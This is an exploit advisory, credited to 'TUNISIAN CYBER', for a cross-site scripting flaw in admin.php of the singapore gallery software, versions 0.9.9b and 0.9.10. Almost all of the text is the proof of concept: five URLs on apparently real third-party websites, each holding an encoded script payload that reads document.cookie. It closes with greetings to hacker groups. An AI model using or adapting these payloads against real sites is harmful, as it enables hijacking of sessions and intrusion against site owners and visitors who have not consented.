[+] Author: TUNISIAN CYBER [+] Exploit Title: singapore v0.9.9b/0.9.10 (admin.php) POST Cross Site Scripting Vulnerability [+] Date: 05-02-2014 [+] Category: WebApp [+] Google Dork: : [+] Tested on: KaliLinux [+] Vendor: http://sourceforge.net/projects/singapore/ [+] Friendly Sites: na3il.com,th3-creative.com ############################################################### +Description: n/a +Exploit: singapore v0.9.9b/0.9.10 suffers from a cross-site scripting vulnerability +PoC: http://www.photoscene.com/kimandsteve/gallery/admin.php/%22ns=%22alert%280x0000BF%29%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://truestreet.net/photos/admin.php/%22ns=%22alert%280x0000BF%29%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://www.jingai.com/singapore/admin.php/%22ns=%22alert%280x0000BF%29%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://www.movens-reisen.com/gallery/admin.php/%22ns=%22alert%280x0000BF%29%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://sikh.se/bilder/admin.php/%22ns=%22alert%280x0000BF%29%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E ######################################################################################## Greets to: XMaX-tn, N43il HacK3r, XtechSEt Sec4Ever Members: DamaneDz UzunDz GEOIX ########################################################################################